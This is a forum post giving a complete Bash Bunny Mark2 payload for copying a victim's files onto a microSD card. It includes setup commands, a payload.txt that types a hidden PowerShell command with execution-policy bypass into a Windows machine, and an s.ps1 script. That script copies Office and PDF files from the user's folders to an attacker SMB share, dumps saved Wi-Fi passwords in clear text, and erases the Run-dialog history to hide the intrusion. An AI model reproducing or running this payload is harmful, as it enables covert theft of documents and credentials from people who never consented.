SMB Exfil to microSD (Mark2)

[jblk01]

Now you can involuntary backup more of the targets data by writing to the microSD card instead of the internal storage.

 

Prerequisite:

 

SSH or serial into your Bunny MK2 and do the following:

 

'timedatectl set-time' followed by the current year, month and date.

Run: 'apt update ; apt install gcc'

'cd /tools'

'wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz'

'tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/'

'rm -f impacket-0.9.19.tar.gz'

'cd impacket'

'pip install -r requirements.txt'

'cd ../'

'mkdir tmp'

'cd tmp'

'pip2 install setuptools-rust'

'pip2 install cryptography'

'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg'

 'rm -f pyans1-0.4.8-py2.7.egg'

'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz'

'tar -xzvf pycryptodomex-3.10.1.tar.gz'

'cd pycryptodomex-2.10.1 && python setup.py install' 

'cd /tools/'

'rm -rf tmp/'

'cd impacket/ && python setup.py install'

 

Now on your microSD card, create the following directory structure:

 

/smb
|___loot/
|___s.ps1

 

Copy the following payload.txt into either switch 1 or switch 2:

 

######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION
# Mound SD as udisk
udisk mount

######## ETHERNET STAGE ########
LED STAGE1
# Start the SMB Server
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /root/udisk/smb >> /root/udisk/smb/smbserver.log &


######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
GET HOST_IP
LED STAGE2
ATTACKMODE HID RNDIS_ETHERNET
Q GUI r
Q DELAY 500
Q STRING cmd /C \"start /b powershell -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
Q ENTER
LED SPECIAL
# Wait until files are done copying
while ! [ -f /root/udisk/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done


######## CLEANUP ########
LED CLEANUP
# Delete EXFILTRATION_COMPLETE file
rm -rf /root/udisk/smb/EXFILTRATION_COMPLETE
# Sync file system
sync
# Unmount the SD card
udisk unmount

######## FINISH ########
# Trap is clean
sync
LED FINISH
shutdown 0

 

Finally here is the s.ps1:

 

$exfil_dir="$Env:UserProfile\Downloads"
$exfil_dir1="$Env:UserProfile\Documents"
$exfil_dir2="$Env:UserProfile\Desktop"
$exfil_ext="*.doc*"
$exfil_ext1="*.pdf*"
$exfil_ext2="*.xls*"
$exfil_ext3="*.ppt*"
$loot_dir="\\172.16.64.1\s\loot\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
mkdir $loot_dir
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
robocopy $exfil_dir1 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
robocopy $exfil_dir2 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$loot_dir\$env:UserName".txt"
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

 

Now, eject the microSD card, insert into your Bunny MK2, move the switch to the one where the payload.txt is placed and insert it into a Windows 10 machine.

 

If done correctly, it should exfiltrate all files specified in the s.ps1 script to the microSD card. 🙂

Edited October 7, 2021 by jblk01
Modified powershell script to allow for multiple directory targeting and so that robocopy will not fail if directory is empty